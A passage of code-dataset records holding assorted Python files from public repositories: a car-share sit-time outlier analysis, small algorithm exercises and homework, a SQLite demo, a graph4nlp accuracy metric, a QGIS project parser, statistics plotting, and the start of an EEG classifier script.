freq = averages[i][1]\n real_sit_time += [(long, lat, time, freq)]\n \n \n \"\"\"\n with open(\"/var/log/outgoing/sit-time-points.js\", \"w\") as outfile: \n outfile.write(\"{}{}\".format(\"var points=\", json.dumps(real_sit_time)))\n # The indicies in the subarray are [lat, lng, sit_time, booking_id, user_id]\n \"\"\"\n return sit_time\n #return list(map(lambda x: x[2], sit_time))\n\ndef get_standard_deviation(sit_times):\n only_times = list(map(lambda x: x[2], sit_times))\n return stdev(only_times)\n\ndef get_outlier_bookings(standard_deviation, sit_times, percent_outside_accepted):\n outliers = list(filter(lambda x: abs(standard_deviation - x[2]) > standard_deviation + ((percent_outside_accepted / 100) * standard_deviation) , sit_times))\n return outliers\n\ndef outliers_by_user(booking_list):\n outliers_counts = {}\n for user in booking_list:\n if user[4] in outliers_counts:\n outliers_counts[user[4]] += 1\n else:\n outliers_counts[user[4]] = 1\n users_list = list(filter(lambda x: outliers_counts[x], outliers_counts))\n users_list = list(map(lambda x: str(x), users_list))\n query = \"select id, first_name, last_name from users where id in ({});\".format(\", \".join(users_list))\n cursor.execute(query)\n user_names = {a : (b, c) for a, b, c in cursor}\n query = \"select user_id, count(id) from bookings where user_id in ({}) group by user_id;\".format(\", \".join(users_list))\n cursor.execute(query)\n bookings_counts = {a : b for a, b in cursor}\n user_ratios = {}\n for key in outliers_counts:\n user_ratios[key] = {\n \"ratio\": outliers_counts[key] / bookings_counts[key],\n \"bookings\": bookings_counts[key],\n \"outliers\": outliers_counts[key]\n }\n output = {}\n for user in user_names:\n output[user_names[user]] = user_ratios[user]\n\n return user_ratios\n\nif __name__ == \"__main__\":\n sit_times = get_sit_times()\n standard_deviation = get_standard_deviation(sit_times)\n outliers = get_outlier_bookings(standard_deviation, sit_times, 0)\n users_with_outliers = outliers_by_user(outliers) \n print(json.dumps(users_with_outliers))\n mysql_connection.close()\n\n","repo_name":"WaiveCar/Waivecar","sub_path":"analysis/sitTimes.py","file_name":"sitTimes.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7328566749","text":"xcount = 0\nycount = 0\n\nread = []\n\nwith open('December2.txt') as file:\n\tfor line in file:\n\t\tline = line.split(\" \")\n\t\tread.append(line)\n\t\tif line[0] == \"forward\":\n\t\t\txcount += int(line[1])\n\t\tif line[0] == \"down\":\n\t\t\tycount -= int(line[1])\n\t\tif line[0] == \"up\":\n\t\t\tycount += int(line[1])\n\nprint(xcount * abs(ycount))\n\nposition = 0\ndepth = 0\naim = 0\n\nfor i in range(len(read)):\n\tif read[i][0] == \"forward\":\n\t\tdepth += (aim * int(read[i][1]))\n\t\tposition += int(read[i][1])\n\tif read[i][0] == \"down\":\n\t\taim += int(read[i][1])\n\tif read[i][0] == \"up\":\n\t\taim -= int(read[i][1])\n\t\t\nprint(position * depth)\n","repo_name":"eduardoloz/CCC","sub_path":"AdventOfCode/2-Dive/December2.py","file_name":"December2.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41558741430","text":"class LinearSearch:\n\n\n def search(self,list,n):\n\n for i in range(len(list)):\n if list[i]==n:\n return True\n return False\n\n\n\nlist = [1,2,3,4,5]\nobj=LinearSearch();\nresult =obj.search(list,7);\nif result:\n print(\"found\")\nelse:\n print(\"not found\")","repo_name":"Mohit0888/Variables","sub_path":"variable/linearSearch.py","file_name":"linearSearch.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70507793372","text":"# Напишите программу, которой на вход подается последовательность чисел через пробел, а также\r\n# запрашивается у пользователя любое число.\r\n# В качестве задания повышенного уровня сложности можете выполнить проверку соответствия указанному\r\n# в условии ввода данных.\r\n# Далее программа работает по следующему алгоритму:\r\n# --Преобразование введённой последовательности в список\r\n# --Сортировка списка по возрастанию элементов в нем(для реализации сортировки определите функцию)\r\n# --Устанавливается номер позиции элемента, который меньше введенного пользователем числа, а следующий\r\n# за ним больше или равен этому числу.\r\n#\r\n# При установке позиции элемента воспользуйтесь алгоритмом двоичного поиска, который был рассмотрен в\r\n# этом модуле. Реализуйте его также отдельной функцией.\r\n#\r\n# Подсказка\r\n# Помните, что у вас есть числа, которые могут не соответствовать заданному условию. В этом случае необходимо\r\n# вывести соответствующее сообщение.\r\n\r\n# можно выбрать: вводим числа с клавиатуры или загружаем из файла\r\n\r\nimport sys\r\n\r\ndef sort(L):\r\n for i in range(len(L)):\r\n idx_min = i\r\n for j in range(i, len(L)):\r\n if L[j] < L[idx_min]:\r\n idx_min = j\r\n if i != idx_min:\r\n L[i], L[idx_min] = L[idx_min], L[i]\r\n return L\r\n\r\ndef search(L, num, left, right):\r\n if left > right:\r\n return False\r\n middle = (right + left) // 2\r\n if L[middle] == num:\r\n return middle\r\n elif num < L[middle]:\r\n return search(L, num, left, middle - 1)\r\n else:\r\n return search(L, num, middle + 1, right)\r\n\r\n\r\n# алфавит допустимых символов\r\nsymbols = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.', '-', ' ', '\\n')\r\n\r\ninput_str = '' # здесь храним введенную строку\r\nerror_symbol = '' # переменная для хранения неверных символов\r\nmy_str = ''\r\n\r\nanswer = input(\"Данные возьмем из файла (1) или введем с клавиатуры (2)?\\n\")\r\nif answer == '1':\r\n file_name = input('Введите имя файла с последовательностью чисел ')\r\n try:\r\n with open(file_name) as file:\r\n my_str = file.readline()\r\n except FileNotFoundError:\r\n print('Файл не найден')\r\n exit()\r\nelif answer == '2':\r\n print('Введите последовательность чисел через пробел.')\r\n my_str = sys.stdin.readline()\r\nelse:\r\n print('При следующем запуске программы введите \"1\" или \"2\"\\nЗавершаем работу...')\r\n exit()\r\n\r\nfor char in my_str:\r\n if char in symbols:\r\n input_str += char\r\n else:\r\n error_symbol += char\r\nif error_symbol:\r\n print('Вы ввели недопустимые символы: \"' + error_symbol + '\"')\r\n\r\n# если пользователь поставил минус после числа\r\ntry:\r\n list_of_numbers = list(map(float, input_str.split()))\r\nexcept ValueError:\r\n print('Символ \"-\" должен находиться перед числом\\nЗавершаем работу...')\r\n exit()\r\n\r\n# вводим число и добавляем его к списку\r\nnumber = float(input('Введите число: \\n'))\r\nprint('Список до сортировки: ' + str(list_of_numbers))\r\nlist_of_numbers.append(number)\r\n\r\n# сортируем\r\nlist_of_numbers = sort(list_of_numbers)\r\n\r\n# ищем позицию числа, введенного пользователем\r\npoz = search(list_of_numbers, number, 0, len(list_of_numbers))\r\nif poz == 0:\r\n print('Введенное число является минимальным среди чисел последовательности') # поэтому\r\n # не удовлетворяет нашим условиям\r\nelif list_of_numbers[-1] == number and list_of_numbers[-1] != list_of_numbers[-2]:\r\n print('Введенное число является максимальным среди чисел последовательности') # и после него нет числа,\r\n # равного введенному, поэтому не удовлетворяет нашим условиям\r\nelse:\r\n while list_of_numbers[poz] == list_of_numbers[poz - 1]:\r\n poz -= 1\r\n print(f'Индекс элемента списка, который меньше числа {number}: ' + str(poz - 1))\r\nlist_of_numbers.pop(poz)\r\nprint('Список после сортировки: ' + str(list_of_numbers))\r\n","repo_name":"ivmiller/HomeWork","sub_path":"1791-2.py","file_name":"1791-2.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43250331877","text":"import argparse\nimport subprocess\n\n# usage: python main.py \"filepathtogradebook\" \"filepathtomajors\" \"filepathtoresults\" \"gradebook_studentid\" \"gradebook_assignment\" \"major_studentid\" \"major_name\" lowerthresholdinclusive higherthresholdexclusive\ndef get_arguments():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('gradebook')\n\tparser.add_argument('majorlist')\n\tparser.add_argument('range_results')\n\tparser.add_argument('grade_id')\n\tparser.add_argument('grade_column')\n\tparser.add_argument('major_id')\n\tparser.add_argument('major_column')\n\tparser.add_argument('lower_threshold', type=float)\n\tparser.add_argument('higher_threshold', type=float)\n\treturn parser.parse_args()\n\t\n# runs both range.py and pie.py so as to simplify process for user\ndef main():\n\targs = get_arguments()\n\tsubprocess.run([\"python\", \"range.py\", args.gradebook, args.majorlist, args.range_results, args.grade_id, args.grade_column, args.major_id, args.major_column, str(args.lower_threshold), str(args.higher_threshold)])\n\tsubprocess.run([\"python\", \"pie.py\", args.range_results, args.grade_column, str(args.lower_threshold), str(args.higher_threshold)])\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"Amndeep7/DrexelCSDepartmentAnalysisTool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38819414985","text":"import sqlite3\r\ndb = sqlite3.connect('python_programming_db')\r\ncursor = db.cursor() # Get a cursor object\r\n\r\ncursor.execute('''\r\n DROP TABLE IF EXISTS Student;\r\n''')\r\n\r\ncursor.execute(''' \r\n CREATE TABLE IF NOT EXISTS Student\r\n (\r\n id INTEGER PRIMARY KEY, \r\n name TEXT,\r\n grade INTEGER\r\n );\r\n''')\r\ndb.commit()\r\n\r\n# Inserting students\r\ncursor.execute('''\r\n INSERT INTO Student\r\n (\r\n id,\r\n name, \r\n grade\r\n )\r\n VALUES\r\n (\r\n 55,\r\n 'Carl Davis',\r\n 61\r\n ),\r\n (\r\n 66,\r\n 'Dennis Fredrickson',\r\n 88\r\n ),\r\n (\r\n 77,\r\n 'Jane Richards',\r\n 78\r\n ),\r\n (\r\n 12,\r\n 'Peyton Sawyer',\r\n 45\r\n ),\r\n (\r\n 2,\r\n 'Lucas Brooke',\r\n 99\r\n )\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Select all records with grade between 60 and 80\r\ncursor.execute('''\r\n SELECT * FROM Student\r\n WHERE\r\n grade BETWEEN 60 AND 80;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Update Carl Davis' grade to 65\r\ncursor.execute('''\r\n UPDATE Student\r\n SET grade = 65\r\n WHERE\r\n name = 'Carl Davis';\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Delete Dennis Fredrickson's row\r\ncursor.execute('''\r\n DELETE FROM Student\r\n WHERE\r\n name = 'Dennis Fredrickson'\r\n''')\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Change the grade of all people with an id less than 55\r\ncursor.execute('''\r\n UPDATE Student\r\n SET grade = 1\r\n WHERE\r\n id < 55;\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\ndb.close()\r\nprint('Connection to database closed')\r\n","repo_name":"ehmtang/SE-Bootcamp-HyperionDev","sub_path":"T47 - SQLite/database_manip.py","file_name":"database_manip.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69980423772","text":"import copy\nimport warnings\nimport numpy as np\nimport torch\n\nfrom graph4nlp.pytorch.modules.evaluation.base import EvaluationMetricBase\n\n\nclass Accuracy(EvaluationMetricBase):\n \"\"\"\n Calculate precision, recall, F1 for each labels\n\n Parameters\n ----------\n metrics: list\n Indicate the metric for the class to return.\n Note that each metric must be one of ``precision``, ``recall``, ``F1``, ``accuracy``.\n And the results' order is the same as the metrics.\n \"\"\"\n\n def __init__(self, metrics):\n super().__init__()\n if isinstance(metrics, list):\n for metric in metrics:\n if metric not in [\"precision\", \"recall\", \"F1\", \"accuracy\"]:\n raise TypeError(\n \"argument metric must be list of str containing \"\n \"'precision', 'recall', 'F1', 'accuracy'\"\n )\n self.metrics = metrics\n\n def calculate_scores(\n self, ground_truth, predict, average=None, zero_division=\"warning\", sample_weight=None\n ):\n \"\"\"\n The function to calculate the expected metrics for each labels\n\n Parameters\n ----------\n ground_truth: torch.Tensor\n Ground truth (correct) target values, 1d tensor\n predict: torch.Tensor\n The predicted target values generated by classifier, 1d tensor\n average: string or None, [None (default), 'micro', 'macro', 'weighted']\n If set ``None``, it will return the scores for each class.\n Otherwise, it will be reduced by the strategy as follows:\n\n ``'micro'``:\n Calculate metrics globally by counting the total true positives,\n false negatives and false positives.\n\n ``'macro'``:\n Calculate metrics for each label, and calculate the unweighted\n average values. This does not take label imbalance into account.\n\n ``'weighted'``:\n Calculate metrics for each label, and calculate the weighted\n average value. Note that the weight is the number of the true\n instances for each label.\n\n zero_division: \"warning\", 0, 1, default=\"warning\"\n Sets the value to return when there is a zero division.\n\n If set to \"warning\", this acts as 0, but warnings are also raised.\n\n sample_weight: None\n The sample weight. It is not implemented yet.\n\n Returns\n -------\n scores: list[object]\n Return the expected metrics initialized in init function in ``precision``, ``recall``, \\\n ``F1`` order\n \"\"\"\n ground_truth_np, predict_np = self._check_available(ground_truth, predict, zero_division)\n\n # calculate accuracy\n scores = ground_truth_np == predict_np\n accuracy_score = np.average(scores)\n\n if self.metrics is [\"precision\"]:\n return [accuracy_score]\n\n mcm = self._calculate_confusion_matrix(ground_truth=ground_truth_np, predict=predict_np)\n\n tp_sum = mcm[:, 1, 1]\n pred_sum = tp_sum + mcm[:, 0, 1]\n gt_sum = tp_sum + mcm[:, 1, 0]\n\n if average == \"micro\":\n tp_sum = np.array([tp_sum.sum()])\n pred_sum = np.array([pred_sum.sum()])\n gt_sum = np.array([gt_sum.sum()])\n\n # calculate precision and recall\n precision = self._prf_divide(tp_sum, pred_sum, zero_division=zero_division)\n recall = self._prf_divide(tp_sum, gt_sum, zero_division=zero_division)\n\n # calculate F_beta\n beta2 = 1 ** 2 # note: only F1 here\n denominator = beta2 * precision + recall\n\n denominator[denominator == 0.0] = 1 # avoid division by 0\n f_score = (1 + beta2) * precision * recall / denominator\n\n if average == \"weighted\":\n weighted = gt_sum\n else:\n weighted = None\n\n if average is not None:\n precision = np.average(precision, weights=weighted)\n recall = np.average(recall, weights=weighted)\n f_score = np.average(f_score, weights=weighted)\n scores = []\n\n for metric_name in self.metrics:\n if metric_name == \"precision\":\n scores.append(precision)\n elif metric_name == \"recall\":\n scores.append(recall)\n elif metric_name == \"F1\":\n scores.append(f_score)\n elif metric_name == \"accuracy\":\n scores.append(accuracy_score)\n else:\n raise NotImplementedError()\n return scores\n\n @staticmethod\n def _prf_divide(numerator, denominator, zero_division):\n \"\"\"\n The function performs division and handles zero-division situations.\n\n Parameters\n ----------\n numerator: numpy.ndarray\n denominator: numpy.ndarray\n zero_division: \"warning\", 0, 1, default=\"warning\"\n Sets the value to return when there is a zero division.\n\n If set to \"warning\", this acts as 0, but warnings are also raised.\n Returns\n -------\n results: numpy.ndarray\n The division results.\n\n \"\"\"\n zero_mask = denominator == 0.0\n denominator_cp = copy.deepcopy(denominator)\n denominator_cp[zero_mask] = 1.0\n ret = numerator / denominator_cp\n if np.sum(zero_mask) == 0:\n return ret\n ret[zero_mask] = 0.0 if zero_division in [\"warning\", 0] else 1.0\n if zero_division == \"warning\":\n warnings.warn(\"zero division encountered\")\n return ret\n\n @staticmethod\n def _check_available(ground_truth, predict, zero_division):\n \"\"\"\n The function to check the parameters.\n If all tests are passed, it will convert the tensor to numpy.\n\n Parameters\n ----------\n ground_truth: Any\n predict: Any\n zero_division: Any\n\n Returns\n -------\n ground_truth: numpy.ndarray\n numpy version of tensor ground_truth\n predict: numpy.ndarray\n numpy version of tensor predict\n\n Raises\n -------\n TypeError: TypeError\n ValueError: ValueError\n \"\"\"\n if not isinstance(ground_truth, torch.Tensor):\n raise TypeError(\"argument ground_truth must be torch.tensor\")\n if not isinstance(predict, torch.Tensor):\n raise TypeError(\"argument predict must be torch.tensor\")\n if ground_truth.dtype not in [torch.int, torch.int8, torch.int16, torch.int32, torch.int64]:\n raise TypeError(\"argument ground_truth must be int tensor\")\n if predict.dtype not in [torch.int, torch.int8, torch.int16, torch.int32, torch.int64]:\n raise TypeError(\"argument predict must be int tensor\")\n if len(ground_truth.shape) != 1:\n raise TypeError(\"argument ground_truth must be 1d tensor\")\n if len(predict.shape) != 1:\n raise TypeError(\"argument predict must be 1d tensor\")\n if ground_truth.shape[0] != predict.shape[0]:\n raise ValueError(\"argument ground_truth and predict must be the same shape\")\n\n zero_division_ok = False\n if isinstance(zero_division, str) and zero_division == \"warning\":\n zero_division_ok = True\n elif isinstance(zero_division, (int, float)) and zero_division in [0, 1]:\n zero_division_ok = True\n\n if not zero_division_ok:\n raise ValueError(\"argument zero_division must be in ['warning', 0, 1]\")\n\n return ground_truth.numpy(), predict.numpy()\n\n def _calculate_confusion_matrix(self, ground_truth, predict):\n \"\"\"\n The function to calculate the confusion matrix for multi-class inputs.\n The labels will be collected and relabeled. (eg: [1, 2, 3] --> [0, 1, 2])\n\n In multi-class confusion matrix :math:`MCM`, the count of true negatives is\n :math:`MCM_{:,0,0}`, false positives is :math:`MCM_{:,0,1}`, false negatives\n is :math:`MCM_{:,1,0}` and true positive is :math:`MCM_{:,1,1}`.\n\n Parameters\n ----------\n ground_truth: numpy.ndarray\n predict: numpy.ndarray\n\n Returns\n -------\n confusion_matrix: numpy.ndarray\n The confusion matrix which has the shape: [num_labels, 2, 2]\n \"\"\"\n # select all labels, remove duplicates and sort\n unique_labels = sorted(self._get_unique_labels(ground_truth, predict))\n\n # do relabeling\n ground_truth_transformed = np.searchsorted(unique_labels, ground_truth)\n predict_transformed = np.searchsorted(unique_labels, predict)\n\n # the number of labels after relabeling\n n_labels = len(unique_labels)\n\n tp = ground_truth_transformed == predict_transformed\n tp_bins = ground_truth_transformed[tp]\n tp_sum = np.bincount(tp_bins, weights=None, minlength=n_labels)\n pred_sum = np.bincount(predict_transformed, minlength=n_labels)\n gt_sum = np.bincount(ground_truth_transformed, minlength=n_labels)\n fp = pred_sum - tp_sum\n fn = gt_sum - tp_sum\n tp = tp_sum\n tn = ground_truth_transformed.shape[0] - tp - fp - fn\n return np.array([tn, fp, fn, tp]).T.reshape(-1, 2, 2)\n\n @staticmethod\n def _get_unique_labels(*lists):\n \"\"\"\n find the unique elements in the given lists\n\n Parameters\n ----------\n lists: [numpy.ndarray]\n List of lists which contain labels.\n Returns\n -------\n unique_labels: numpy.ndarray\n It has unique labels encountered in the ``lists``.\n \"\"\"\n ret = []\n for li in lists:\n unique_li = np.unique(li)\n ret.extend(unique_li.tolist())\n ret = list(set(ret))\n return np.array(ret)\n","repo_name":"graph4ai/graph4nlp","sub_path":"graph4nlp/pytorch/modules/evaluation/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":9915,"program_lang":"python","lang":"en","doc_type":"code","stars":1637,"dataset":"github-code","pt":"32"} +{"seq_id":"28824983423","text":"import os\n\nfrom collections import OrderedDict\nfrom PyQt4.QtXml import QDomDocument\nfrom PyQt4.QtCore import QDir, QFileInfo\n\nfrom qgis.gui import QgsMapCanvasLayer\nfrom qgis.core import QgsVectorLayer, QgsRasterLayer, QgsMapLayerRegistry, QgsMapSettings, QgsProject\n\n\ndef layer_by_id(layerid):\n return QgsMapLayerRegistry.instance().mapLayers()[layerid]\n\n\ndef iternodes(nodes):\n for index in xrange(nodes.length()):\n yield nodes.at(index).toElement()\n\n\nclass Project(object):\n def __init__(self, xmldoc):\n self.doc = xmldoc\n self._maplayers = None\n\n @classmethod\n def fromFile(cls, filename):\n QDir.setCurrent(os.path.dirname(filename))\n fileinfo = QFileInfo(filename)\n QgsProject.instance().read(fileinfo)\n xml = open(filename).read()\n doc = QDomDocument()\n doc.setContent(xml)\n return cls(doc)\n\n def _createLayer(self, node):\n type = node.attribute('type')\n if type == \"vector\":\n layer = QgsVectorLayer()\n elif type == \"raster\":\n layer = QgsRasterLayer()\n else:\n return None\n layer.readLayerXML(node)\n return layer\n\n def _getLayer(self, node):\n filelist = node.elementsByTagName(\"legendlayerfile\")\n layerfile = filelist.at(0).toElement()\n layerid = layerfile.attribute('layerid')\n visible = int(layerfile.attribute('visible'))\n return layerid, bool(visible)\n\n def maplayers(self):\n return QgsMapLayerRegistry.instance().mapLayers().values()\n\n def legendlayers(self):\n legendnodes = self.doc.elementsByTagName(\"legendlayer\")\n layers = OrderedDict()\n for elm in iternodes(legendnodes):\n layerid, visible = self._getLayer(elm)\n layers[layerid] = visible\n return layers\n\n def settings(self):\n \"\"\"\n Return the settings that have been set for the map canvas.\n @return: A QgsMapSettings instance with the settings read from the project.\n \"\"\"\n canvasnodes = self.doc.elementsByTagName(\"mapcanvas\")\n node = canvasnodes.at(0).toElement()\n settings = QgsMapSettings()\n settings.readXML(node)\n return settings\n\n def visiblelayers(self):\n # Filter out only the ones we can see.\n visible = [layerid for layerid, visible in self.legendlayers().iteritems() if visible]\n return [layer_by_id(layerid) for layerid in visible]\n","repo_name":"NathanW2/qgis2img","sub_path":"qgis2img/projectparser.py","file_name":"projectparser.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"37236627056","text":"# Statistische Muserekennung WS 2023\n# Benjamin Stifter, 01618881\n# Olivia Panzenböck, 11775488\n\nimport numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate\n\n\n# Aufgabe3\n\ndef dichte(x, mu, std):\n p_x=[]\n for i in x:\n p_x1 = 1/(np.sqrt(2*np.pi)*std) * np.exp(-np.power(i-mu,2)/(2*np.power(std,2))) # S. 237\n p_x.append(p_x1)\n return p_x\n\ndef rand(x, p_x_mu, p_mu, p_x_mu2, p_mu2 ):\n p_x=[]\n for i in range(len(x)):\n p_x1=p_x_mu[i] * p_mu +p_x_mu2[i] * p_mu2\n p_x.append(p_x1)\n return p_x\n\n return\n\ndef posterior(x, p_x_mu, p_mu, p_x):\n p_mu_x=[]\n for i in range(len(x)):\n p_mu_x1=(p_mu[i] * p_x_mu) / p_x[i]\n p_mu_x.append(p_mu_x1)\n return p_mu_x\n\n# Werte\np_H0 = [0.9, 0.99]\np_H1 = [0.1, 0.01]\nmu_H0 = 4\nstd_H0 = np.sqrt(1)\nmu_H1 = 5\nstd_H1 = np.sqrt(1)\n\n# Aufgabe a)\nx_values=np.linspace(0, 12, 1000)\n\nFalse_P = 1-stats.norm.cdf(x_values, loc=mu_H0, scale=std_H0) # false positive\nTrue_P = 1-stats.norm.cdf(x_values, loc=mu_H1, scale=std_H1) # true positive\n\nVW1=[]\nVW2=[]\nfor i, j in enumerate(x_values):\n a = (True_P[i] * p_H1[0]) / (True_P[i] * p_H1[0] + False_P[i] * p_H0[0])\n b = (True_P[i] * p_H1[1]) / (True_P[i] * p_H1[1] + False_P[i] * p_H0[1])\n VW1.append(a)\n VW2.append(b)\n\n\nplt.figure(figsize=(18, 12))\nplt.plot(x_values, VW1, color='orange', label=r'$H_0$ = 0.9, $H_1$ = 0.1')\nplt.plot(x_values, VW2, color='brown', label=r'$H_0$ = 0.99, $H_1$ = 0.01')\n#plt.title(r'positiven Vorhersagewert als Funktion der Entscheidungsgrenze')\nplt.ylabel(r'$p(H_1|+)$')\nplt.xlabel(r'$x^*$')\nplt.legend()\nplt.grid(True)\nplt.savefig('plots/Aufgabe3/a.eps', format='eps')\nplt.show()\n\n\n# Aufgabe b)\npx_H0 = dichte(x_values, mu_H0, std_H0)\npx_H1 = dichte(x_values, mu_H1, std_H1)\npx_9 = rand(x_values, px_H0, p_H0[0], px_H1, p_H1[0])\npx_99 = rand(x_values, px_H0, p_H0[1], px_H1, p_H1[1])\np_H0_x_9 = posterior(x_values,p_H0[0], px_H0, px_9)\np_H1_x_9 = posterior(x_values,p_H1[0], px_H1, px_9)\np_H0_x_99 = posterior(x_values,p_H0[1], px_H0, px_99)\np_H1_x_99 = posterior(x_values,p_H1[1], px_H1, px_99)\n\n# Schnittmenge finden\nround1 = [round(zahl, 5) for zahl in p_H0_x_9]\nround2 = [round(zahl, 5) for zahl in p_H1_x_9]\ngemeinsame_elemente = set(round1).intersection(round2)\ngemeinsame_elemente = [x for x in round1 if x in round2]\nprint(list(gemeinsame_elemente))\nP1_err_H0 = 1-stats.norm.cdf(6.7, loc=mu_H0, scale=std_H0)*p_H0[0]\nP2_err_H0 = stats.norm.cdf(6.7, loc=mu_H1, scale=std_H1)*p_H1[0]\nR1 = 1-stats.norm.cdf(9.1, loc=mu_H0, scale=std_H0)*p_H0[1]\nR2 = stats.norm.cdf(9.1, loc=mu_H1, scale=std_H1)*p_H1[1]\n\nBFR_9 = P1_err_H0 + P2_err_H0\nBFR_99 = R1 + R2\n\nprint(BFR_9)\nprint(BFR_99)\n\nplt.figure(figsize=(18, 12))\nplt.plot(x_values, p_H0_x_9, label=r'$H_0$ = 0.9, $H_1$ = 0.1', color='orange')\nplt.plot(x_values, p_H1_x_9, color='orange')\nplt.plot(x_values, p_H0_x_99, color='brown')\nplt.plot(x_values, p_H1_x_99, label=r'$H_0$ = 0.99, $H_1$ = 0.01', color='brown')\nplt.plot([6.7, 6.7], [0, 1], color='k')\nplt.plot([9.1, 9.1], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title('Posteriors')\nplt.grid(True)\nplt.ylabel(r'$p(H_i|x)$')\nplt.xlabel(r'$x$')\nplt.legend()\nidx1 = np.argwhere(np.diff(np.sign(np.array(p_H0_x_9) - np.array(p_H1_x_9)))).flatten()\nidx2 = np.argwhere(np.diff(np.sign(np.array(p_H0_x_99) - np.array(p_H1_x_99)))).flatten()\nprint(idx1)\nprint(idx2)\nprint(x_values[514])\nprint(x_values[698])\nplt.savefig('plots/Aufgabe3/b_3.eps', format='eps')\nplt.show()\n\n\n\n# Aufgabe c)\nplt.figure(figsize=(18, 12))\nplt.plot(False_P, True_P, color='green')\n#plt.title(r'ROC-Kurve')\nplt.xlabel(r'$\\alpha$')\nplt.ylabel(r'$1 - \\beta$')\nplt.grid(True)\nplt.savefig('plots/Aufgabe3/c.eps', format='eps')\nplt.show()\n\n\n\n#Test\nplt.figure(figsize=(18, 12))\np_x_H0 = dichte(x_values, mu_H0, std_H0)\np_x_H1 = dichte(x_values, mu_H1, std_H1)\nplt.plot(x_values, p_x_H0, label=r'$H_0$ - gesund', color='red', linestyle='--')\nplt.plot(x_values, p_x_H1, label=r'$H_1$ - infiziert', color='blue', linestyle='--')\nplt.plot(x_values, p_H0_x_9, label=r'$H_0$ = 0.9', color='red')\nplt.plot(x_values, p_H1_x_9,label=r'$H_1$ = 0.1', color='blue')\nplt.plot([6.7, 6.7], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title(r'Wahrscheinlichkeitsfuntion $H_0$ und $H_1$')\nplt.grid(True)\nplt.ylabel(r'$p(x|H_i)$')\nplt.xlabel(r'$x$')\nplt.legend()\nplt.savefig('plots/Aufgabe3/b_1.eps', format='eps')\nplt.show()\n\n#Test\nplt.figure(figsize=(18, 12))\np_x_H0 = dichte(x_values, mu_H0, std_H0)\np_x_H1 = dichte(x_values, mu_H1, std_H1)\nplt.plot(x_values, p_x_H0, label=r'$H_0$ - gesund',color='red', linestyle='--')\nplt.plot(x_values, p_x_H1, label=r'$H_1$ - infiziert', color='blue', linestyle='--')\nplt.plot(x_values, p_H0_x_99, label=r'$H_0$ = 0.99', color='red')\nplt.plot(x_values, p_H1_x_99,label=r'$H_1$ = 0.01', color='blue')\nplt.plot([9.1, 9.1], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title(r'Wahrscheinlichkeitsfuntion $H_0$ und $H_1$')\nplt.grid(True)\nplt.ylabel(r'$p(x|H_i)$')\nplt.xlabel(r'$x$')\nplt.legend()\nplt.savefig('plots/Aufgabe3/b_2.eps', format='eps')\nplt.show()","repo_name":"livi099/Statistische_Mustererkennung_UE","sub_path":"Uebung2/Aufgabe 3 old.py","file_name":"Aufgabe 3 old.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7774565972","text":"\"\"\"\r\nCreated on Wed Feb 14 22:22:09 2018\r\n\r\n@author: Anet\r\nprint(__doc__)\r\n\"\"\"\r\nimport mne\r\nimport numpy as np\r\nfrom mne import io\r\nimport platform; print(platform.platform())\r\nimport sys; print(\"Python\", sys.version)\r\nimport numpy; print(\"NumPy\", numpy.__version__)\r\nimport scipy; print(\"SciPy\", scipy.__version__)\r\nimport sklearn; print(\"Scikit-Learn\", sklearn.__version__)\r\nimport feature as ft\r\nimport lda as lda\r\nimport epochs_methods as epoch_met\r\nimport input_test_data as load_file_names\r\nfrom builtins import print\r\nimport mix_data_x_y as mix\r\nimport config\r\nimport neural_network as neural_network\r\nimport print_results\r\nfrom numpy.random import seed\r\nfrom keras.models import load_model\r\n\r\n\r\nseed(1)\r\n\r\n\r\n#turn off log\r\nmne.set_log_level('ERROR')\r\n# import os\r\n# os.environ[\"TF_CPP_MIN_LOG_LEVEL\"]=\"4\"\r\n\r\n# Set path to raw data folder \r\nDATA_FOLDER ='C:/Users/Anet/eclipse-workspace/Classification/raw_data/'\r\n\r\n\r\n# Set EEG event list - instruction\r\n\r\n\r\n\r\n##############################################\r\n#\r\n# Data loading\r\n#\r\n##############################################\r\n\r\n# mapu, ve ktere jsou ulozeny nazvy trenovacich souboru 